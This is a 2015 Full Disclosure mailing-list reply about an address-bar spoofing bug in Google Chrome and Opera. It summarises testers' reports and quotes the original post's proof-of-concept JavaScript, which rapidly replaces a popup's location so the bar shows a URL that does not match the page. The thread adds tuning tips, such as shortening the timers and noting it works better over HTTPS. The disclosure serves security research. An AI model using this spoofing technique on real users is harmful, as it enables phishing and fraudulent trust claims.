Open Source and information security mailing list archives
Date: Wed, 01 Jul 2015 14:39:14 +0100
From: David Leo <>
Subject: Re: [FD] Google Chrome Address Spoofing (Request For Comment)
Big Whale said:
"Tested on Google Chrome 43.0.2357.130 (64-bit) (Linux) and it works"
"clearly URL spoofing"
Thanks for testing!
0pc0deFR said:
"Work on Google Chrome Ubuntu"
Bonjour, thanks for testing!
Daniel Micay said:
"It does display a window with the address"
"why you've got an ever increasing number of setTimeout events"
Alexander E. Patrakov said:
"Looks like a fork bomb"
Thanks for testing!
The number of "setTimeout" does NOT need to be increasing forever.
OK, I admit - we are lazy (it works and we don't touch it anymore).
Roney Gomes said:
"it worked on the desktop version of Opera"
Wow! Thanks for letting us know.
Here is the screenshot of Opera
And Chrome
(A number is displayed in Chrome's address bar,
not the same as Opera)
Daniel Micay said:
"it can't always be replicated"
"I've tried it a few times and"
"it fails about as often as it works"
Valentinas Bakaitis said:
"PoC did not work"
Hey! The trick here is timing:
Please modify those numbers in code - make them smaller.
Zak Siddiqui said:
"Is it reproducible with HTTPS?"
Yes, we just tried this URL
It works.
In fact, it works BETTER against HTTPS,
because HTTPS is slower, so timing is easier.
Florian Weimer said:
"they show the new URL while still displaying old content"
Exactly, that's the cause of this bug.

In the end, allow me to repeat:
No user interaction on the fake page.
But, anyone can do
"BBB Accredited Business"
"PayPal Partner"

Kind Regards,

We love clever tricks.
We love this:

On 2015/6/30 7:08, David Leo wrote:
> Impact:
> The "click to verify" thing is completely broken...
> Anyone can be "BBB Accredited Business" etc.
> You can make it display "We love Islamic State" :-)
> Note:
> No user interaction on the fake page.
> Code:
> ***** index.html
> <script>
> function next()
> {
>      w.location.replace(''+n);n++;
>      setTimeout("next();",15);
>      setTimeout("next();",25);
> }
> function f()
> {
>"content.html","_blank","width=500 height=500");
>      i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5);
> }
> </script>
> <a href="#" onclick="f()">Go</a><br>
> ***** content.html
> <b>This web page is NOT</b>
> <script>location="";</script>
> ***** It's online
> (The page says "June/16/2015" - it works as we tested today)
> Request For Comment:
> We reported this to Google.
> They reproduced, and say
> It's DoS which doesn't matter.
> We think it's very strange,
> since the browser does not crash (not DoS),
> and the threat is obvious.
> What's your opinion?
> Kind Regards,
> PS
> We love clever tricks.
> We love this:

Sent through the Full Disclosure mailing list